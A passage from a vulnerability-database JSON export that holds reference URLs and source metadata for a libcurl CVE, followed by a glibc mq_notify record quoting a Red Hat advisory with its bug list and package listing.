"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22609"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4173"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22612"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22610"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22616"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4192"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46059"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0156"
},
{
"trust": 0.1,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0158"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22613"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4193"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30918"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22600"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22599"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4166"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0128"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22597"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22611"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4187"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22582"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213183."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0635"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-3"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.16"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/1944120"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4628"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33938"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22946",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166319",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166112",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164220",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164993",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-09-29T00:00:00",
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-03-15T15:49:02",
"db": "PACKETSTORM",
"id": "166319",
"ident": null
},
{
"date": "2022-02-23T13:41:41",
"db": "PACKETSTORM",
"id": "166112",
"ident": null
},
{
"date": "2021-09-21T15:39:10",
"db": "PACKETSTORM",
"id": "164220",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2021-11-17T15:07:42",
"db": "PACKETSTORM",
"id": "164993",
"ident": null
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"date": "2021-09-29T20:15:08.187000",
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"date": "2023-06-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"date": "2024-03-27T15:12:52.090000",
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "libcurl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.6
}
}
VAR-202105-1306
Vulnerability from variot - Updated: 2026-03-09 22:22The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact. The vulnerability stems from the library's mq_notify function having a use-after-free feature. Bugs fixed (https://bugzilla.redhat.com/):
1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.
Security Fix(es):
-
glibc: Arbitrary read in wordexp() (CVE-2021-35942)
-
glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c (CVE-2021-27645)
-
glibc: mq_notify does not handle separately allocated thread attributes (CVE-2021-33574)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):
1871386 - glibc: Update syscall names for Linux 5.6, 5.7, and 5.8. 1912670 - semctl SEM_STAT_ANY fails to pass the buffer specified by the caller to the kernel 1927877 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c [rhel-8] 1930302 - glibc: provide IPPROTO_MPTCP definition 1932589 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c 1935128 - glibc: Rebuild glibc after objcopy fix for bug 1928936 [rhel-8.5.0] 1965408 - CVE-2021-33574 glibc: mq_notify does not handle separately allocated thread attributes 1977975 - CVE-2021-35942 glibc: Arbitrary read in wordexp()
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: glibc-2.28-164.el8.src.rpm
aarch64: glibc-2.28-164.el8.aarch64.rpm glibc-all-langpacks-2.28-164.el8.aarch64.rpm glibc-common-2.28-164.el8.aarch64.rpm glibc-debuginfo-2.28-164.el8.aarch64.rpm glibc-devel-2.28-164.el8.aarch64.rpm glibc-headers-2.28-164.el8.aarch64.rpm glibc-langpack-aa-2.28-164.el8.aarch64.rpm glibc-langpack-af-2.28-164.el8.aarch64.rpm glibc-langpack-agr-2.28-164.el8.aarch64.rpm glibc-langpack-ak-2.28-164.el8.aarch64.rpm glibc-langpack-am-2.28-164.el8.aarch64.rpm glibc-langpack-an-2.28-164.el8.aarch64.rpm glibc-langpack-anp-2.28-164.el8.aarch64.rpm glibc-langpack-ar-2.28-164.el8.aarch64.rpm glibc-langpack-as-2.28-164.el8.aarch64.rpm glibc-langpack-ast-2.28-164.el8.aarch64.rpm glibc-langpack-ayc-2.28-164.el8.aarch64.rpm glibc-langpack-az-2.28-164.el8.aarch64.rpm glibc-langpack-be-2.28-164.el8.aarch64.rpm glibc-langpack-bem-2.28-164.el8.aarch64.rpm glibc-langpack-ber-2.28-164.el8.aarch64.rpm glibc-langpack-bg-2.28-164.el8.aarch64.rpm glibc-langpack-bhb-2.28-164.el8.aarch64.rpm glibc-langpack-bho-2.28-164.el8.aarch64.rpm glibc-langpack-bi-2.28-164.el8.aarch64.rpm glibc-langpack-bn-2.28-164.el8.aarch64.rpm glibc-langpack-bo-2.28-164.el8.aarch64.rpm glibc-langpack-br-2.28-164.el8.aarch64.rpm glibc-langpack-brx-2.28-164.el8.aarch64.rpm glibc-langpack-bs-2.28-164.el8.aarch64.rpm glibc-langpack-byn-2.28-164.el8.aarch64.rpm glibc-langpack-ca-2.28-164.el8.aarch64.rpm glibc-langpack-ce-2.28-164.el8.aarch64.rpm glibc-langpack-chr-2.28-164.el8.aarch64.rpm glibc-langpack-cmn-2.28-164.el8.aarch64.rpm glibc-langpack-crh-2.28-164.el8.aarch64.rpm glibc-langpack-cs-2.28-164.el8.aarch64.rpm glibc-langpack-csb-2.28-164.el8.aarch64.rpm glibc-langpack-cv-2.28-164.el8.aarch64.rpm glibc-langpack-cy-2.28-164.el8.aarch64.rpm glibc-langpack-da-2.28-164.el8.aarch64.rpm glibc-langpack-de-2.28-164.el8.aarch64.rpm glibc-langpack-doi-2.28-164.el8.aarch64.rpm glibc-langpack-dsb-2.28-164.el8.aarch64.rpm glibc-langpack-dv-2.28-164.el8.aarch64.rpm glibc-langpack-dz-2.28-164.el8.aarch64.rpm glibc-langpack-el-2.28-164.el8.aarch64.rpm glibc-langpack-en-2.28-164.el8.aarch64.rpm glibc-langpack-eo-2.28-164.el8.aarch64.rpm glibc-langpack-es-2.28-164.el8.aarch64.rpm glibc-langpack-et-2.28-164.el8.aarch64.rpm glibc-langpack-eu-2.28-164.el8.aarch64.rpm glibc-langpack-fa-2.28-164.el8.aarch64.rpm glibc-langpack-ff-2.28-164.el8.aarch64.rpm glibc-langpack-fi-2.28-164.el8.aarch64.rpm glibc-langpack-fil-2.28-164.el8.aarch64.rpm glibc-langpack-fo-2.28-164.el8.aarch64.rpm glibc-langpack-fr-2.28-164.el8.aarch64.rpm glibc-langpack-fur-2.28-164.el8.aarch64.rpm glibc-langpack-fy-2.28-164.el8.aarch64.rpm glibc-langpack-ga-2.28-164.el8.aarch64.rpm glibc-langpack-gd-2.28-164.el8.aarch64.rpm glibc-langpack-gez-2.28-164.el8.aarch64.rpm glibc-langpack-gl-2.28-164.el8.aarch64.rpm glibc-langpack-gu-2.28-164.el8.aarch64.rpm glibc-langpack-gv-2.28-164.el8.aarch64.rpm glibc-langpack-ha-2.28-164.el8.aarch64.rpm glibc-langpack-hak-2.28-164.el8.aarch64.rpm glibc-langpack-he-2.28-164.el8.aarch64.rpm glibc-langpack-hi-2.28-164.el8.aarch64.rpm glibc-langpack-hif-2.28-164.el8.aarch64.rpm glibc-langpack-hne-2.28-164.el8.aarch64.rpm glibc-langpack-hr-2.28-164.el8.aarch64.rpm glibc-langpack-hsb-2.28-164.el8.aarch64.rpm glibc-langpack-ht-2.28-164.el8.aarch64.rpm glibc-langpack-hu-2.28-164.el8.aarch64.rpm glibc-langpack-hy-2.28-164.el8.aarch64.rpm glibc-langpack-ia-2.28-164.el8.aarch64.rpm glibc-langpack-id-2.28-164.el8.aarch64.rpm glibc-langpack-ig-2.28-164.el8.aarch64.rpm glibc-langpack-ik-2.28-164.el8.aarch64.rpm glibc-langpack-is-2.28-164.el8.aarch64.rpm glibc-langpack-it-2.28-164.el8.aarch64.rpm glibc-langpack-iu-2.28-164.el8.aarch64.rpm glibc-langpack-ja-2.28-164.el8.aarch64.rpm glibc-langpack-ka-2.28-164.el8.aarch64.rpm glibc-langpack-kab-2.28-164.el8.aarch64.rpm glibc-langpack-kk-2.28-164.el8.aarch64.rpm glibc-langpack-kl-2.28-164.el8.aarch64.rpm glibc-langpack-km-2.28-164.el8.aarch64.rpm glibc-langpack-kn-2.28-164.el8.aarch64.rpm glibc-langpack-ko-2.28-164.el8.aarch64.rpm glibc-langpack-kok-2.28-164.el8.aarch64.rpm glibc-langpack-ks-2.28-164.el8.aarch64.rpm glibc-langpack-ku-2.28-164.el8.aarch64.rpm glibc-langpack-kw-2.28-164.el8.aarch64.rpm glibc-langpack-ky-2.28-164.el8.aarch64.rpm glibc-langpack-lb-2.28-164.el8.aarch64.rpm glibc-langpack-lg-2.28-164.el8.aarch64.rpm glibc-langpack-li-2.28-164.el8.aarch64.rpm glibc-langpack-lij-2.28-164.el8.aarch64.rpm glibc-langpack-ln-2.28-164.el8.aarch64.rpm glibc-langpack-lo-2.28-164.el8.aarch64.rpm glibc-langpack-lt-2.28-164.el8.aarch64.rpm glibc-langpack-lv-2.28-164.el8.aarch64.rpm glibc-langpack-lzh-2.28-164.el8.aarch64.rpm glibc-langpack-mag-2.28-164.el8.aarch64.rpm glibc-langpack-mai-2.28-164.el8.aarch64.rpm glibc-langpack-mfe-2.28-164.el8.aarch64.rpm glibc-langpack-mg-2.28-164.el8.aarch64.rpm glibc-langpack-mhr-2.28-164.el8.aarch64.rpm glibc-langpack-mi-2.28-164.el8.aarch64.rpm glibc-langpack-miq-2.28-164.el8.aarch64.rpm glibc-langpack-mjw-2.28-164.el8.aarch64.rpm glibc-langpack-mk-2.28-164.el8.aarch64.rpm glibc-langpack-ml-2.28-164.el8.aarch64.rpm glibc-langpack-mn-2.28-164.el8.aarch64.rpm glibc-langpack-mni-2.28-164.el8.aarch64.rpm glibc-langpack-mr-2.28-164.el8.aarch64.rpm glibc-langpack-ms-2.28-164.el8.aarch64.rpm glibc-langpack-mt-2.28-164.el8.aarch64.rpm glibc-langpack-my-2.28-164.el8.aarch64.rpm glibc-langpack-nan-2.28-164.el8.aarch64.rpm glibc-langpack-nb-2.28-164.el8.aarch64.rpm glibc-langpack-nds-2.28-164.el8.aarch64.rpm glibc-langpack-ne-2.28-164.el8.aarch64.rpm glibc-langpack-nhn-2.28-164.el8.aarch64.rpm glibc-langpack-niu-2.28-164.el8.aarch64.rpm glibc-langpack-nl-2.28-164.el8.aarch64.rpm glibc-langpack-nn-2.28-164.el8.aarch64.rpm glibc-langpack-nr-2.28-164.el8.aarch64.rpm glibc-langpack-nso-2.28-164.el8.aarch64.rpm glibc-langpack-oc-2.28-164.el8.aarch64.rpm glibc-langpack-om-2.28-164.el8.aarch64.rpm glibc-langpack-or-2.28-164.el8.aarch64.rpm glibc-langpack-os-2.28-164.el8.aarch64.rpm glibc-langpack-pa-2.28-164.el8.aarch64.rpm glibc-langpack-pap-2.28-164.el8.aarch64.rpm glibc-langpack-pl-2.28-164.el8.aarch64.rpm glibc-langpack-ps-2.28-164.el8.aarch64.rpm glibc-langpack-pt-2.28-164.el8.aarch64.rpm glibc-langpack-quz-2.28-164.el8.aarch64.rpm glibc-langpack-raj-2.28-164.el8.aarch64.rpm glibc-langpack-ro-2.28-164.el8.aarch64.rpm glibc-langpack-ru-2.28-164.el8.aarch64.rpm glibc-langpack-rw-2.28-164.el8.aarch64.rpm glibc-langpack-sa-2.28-164.el8.aarch64.rpm glibc-langpack-sah-2.28-164.el8.aarch64.rpm glibc-langpack-sat-2.28-164.el8.aarch64.rpm glibc-langpack-sc-2.28-164.el8.aarch64.rpm glibc-langpack-sd-2.28-164.el8.aarch64.rpm glibc-langpack-se-2.28-164.el8.aarch64.rpm glibc-langpack-sgs-2.28-164.el8.aarch64.rpm glibc-langpack-shn-2.28-164.el8.aarch64.rpm glibc-langpack-shs-2.28-164.el8.aarch64.rpm glibc-langpack-si-2.28-164.el8.aarch64.rpm glibc-langpack-sid-2.28-164.el8.aarch64.rpm glibc-langpack-sk-2.28-164.el8.aarch64.rpm glibc-langpack-sl-2.28-164.el8.aarch64.rpm glibc-langpack-sm-2.28-164.el8.aarch64.rpm glibc-langpack-so-2.28-164.el8.aarch64.rpm glibc-langpack-sq-2.28-164.el8.aarch64.rpm glibc-langpack-sr-2.28-164.el8.aarch64.rpm glibc-langpack-ss-2.28-164.el8.aarch64.rpm glibc-langpack-st-2.28-164.el8.aarch64.rpm glibc-langpack-sv-2.28-164.el8.aarch64.rpm glibc-langpack-sw-2.28-164.el8.aarch64.rpm glibc-langpack-szl-2.28-164.el8.aarch64.rpm glibc-langpack-ta-2.28-164.el8.aarch64.rpm glibc-langpack-tcy-2.28-164.el8.aarch64.rpm glibc-langpack-te-2.28-164.el8.aarch64.rpm glibc-langpack-tg-2.28-164.el8.aarch64.rpm glibc-langpack-th-2.28-164.el8.aarch64.rpm glibc-langpack-the-2.28-164.el8.aarch64.rpm glibc-langpack-ti-2.28-164.el8.aarch64.rpm glibc-langpack-tig-2.28-164.el8.aarch64.rpm glibc-langpack-tk-2.28-164.el8.aarch64.rpm glibc-langpack-tl-2.28-164.el8.aarch64.rpm glibc-langpack-tn-2.28-164.el8.aarch64.rpm glibc-langpack-to-2.28-164.el8.aarch64.rpm glibc-langpack-tpi-2.28-164.el8.aarch64.rpm glibc-langpack-tr-2.28-164.el8.aarch64.rpm glibc-langpack-ts-2.28-164.el8.aarch64.rpm glibc-langpack-tt-2.28-164.el8.aarch64.rpm glibc-langpack-ug-2.28-164.el8.aarch64.rpm glibc-langpack-uk-2.28-164.el8.aarch64.rpm glibc-langpack-unm-2.28-164.el8.aarch64.rpm glibc-langpack-ur-2.28-164.el8.aarch64.rpm glibc-langpack-uz-2.28-164.el8.aarch64.rpm glibc-langpack-ve-2.28-164.el8.aarch64.rpm glibc-langpack-vi-2.28-164.el8.aarch64.rpm glibc-langpack-wa-2.28-164.el8.aarch64.rpm glibc-langpack-wae-2.28-164.el8.aarch64.rpm glibc-langpack-wal-2.28-164.el8.aarch64.rpm glibc-langpack-wo-2.28-164.el8.aarch64.rpm glibc-langpack-xh-2.28-164.el8.aarch64.rpm glibc-langpack-yi-2.28-164.el8.aarch64.rpm glibc-langpack-yo-2.28-164.el8.aarch64.rpm glibc-langpack-yue-2.28-164.el8.aarch64.rpm glibc-langpack-yuw-2.28-164.el8.aarch64.rpm glibc-langpack-zh-2.28-164.el8.aarch64.rpm glibc-langpack-zu-2.28-164.el8.aarch64.rpm glibc-locale-source-2.28-164.el8.aarch64.rpm glibc-minimal-langpack-2.28-164.el8.aarch64.rpm libnsl-2.28-164.el8.aarch64.rpm nscd-2.28-164.el8.aarch64.rpm nss_db-2.28-164.el8.aarch64.rpm
ppc64le: glibc-2.28-164.el8.ppc64le.rpm glibc-all-langpacks-2.28-164.el8.ppc64le.rpm glibc-common-2.28-164.el8.ppc64le.rpm glibc-debuginfo-2.28-164.el8.ppc64le.rpm glibc-debuginfo-common-2.28-164.el8.ppc64le.rpm glibc-devel-2.28-164.el8.ppc64le.rpm glibc-headers-2.28-164.el8.ppc64le.rpm glibc-langpack-aa-2.28-164.el8.ppc64le.rpm glibc-langpack-af-2.28-164.el8.ppc64le.rpm glibc-langpack-agr-2.28-164.el8.ppc64le.rpm glibc-langpack-ak-2.28-164.el8.ppc64le.rpm glibc-langpack-am-2.28-164.el8.ppc64le.rpm glibc-langpack-an-2.28-164.el8.ppc64le.rpm glibc-langpack-anp-2.28-164.el8.ppc64le.rpm glibc-langpack-ar-2.28-164.el8.ppc64le.rpm glibc-langpack-as-2.28-164.el8.ppc64le.rpm glibc-langpack-ast-2.28-164.el8.ppc64le.rpm glibc-langpack-ayc-2.28-164.el8.ppc64le.rpm glibc-langpack-az-2.28-164.el8.ppc64le.rpm glibc-langpack-be-2.28-164.el8.ppc64le.rpm glibc-langpack-bem-2.28-164.el8.ppc64le.rpm glibc-langpack-ber-2.28-164.el8.ppc64le.rpm glibc-langpack-bg-2.28-164.el8.ppc64le.rpm glibc-langpack-bhb-2.28-164.el8.ppc64le.rpm glibc-langpack-bho-2.28-164.el8.ppc64le.rpm glibc-langpack-bi-2.28-164.el8.ppc64le.rpm glibc-langpack-bn-2.28-164.el8.ppc64le.rpm glibc-langpack-bo-2.28-164.el8.ppc64le.rpm glibc-langpack-br-2.28-164.el8.ppc64le.rpm glibc-langpack-brx-2.28-164.el8.ppc64le.rpm glibc-langpack-bs-2.28-164.el8.ppc64le.rpm glibc-langpack-byn-2.28-164.el8.ppc64le.rpm glibc-langpack-ca-2.28-164.el8.ppc64le.rpm glibc-langpack-ce-2.28-164.el8.ppc64le.rpm glibc-langpack-chr-2.28-164.el8.ppc64le.rpm glibc-langpack-cmn-2.28-164.el8.ppc64le.rpm glibc-langpack-crh-2.28-164.el8.ppc64le.rpm glibc-langpack-cs-2.28-164.el8.ppc64le.rpm glibc-langpack-csb-2.28-164.el8.ppc64le.rpm glibc-langpack-cv-2.28-164.el8.ppc64le.rpm glibc-langpack-cy-2.28-164.el8.ppc64le.rpm glibc-langpack-da-2.28-164.el8.ppc64le.rpm glibc-langpack-de-2.28-164.el8.ppc64le.rpm glibc-langpack-doi-2.28-164.el8.ppc64le.rpm 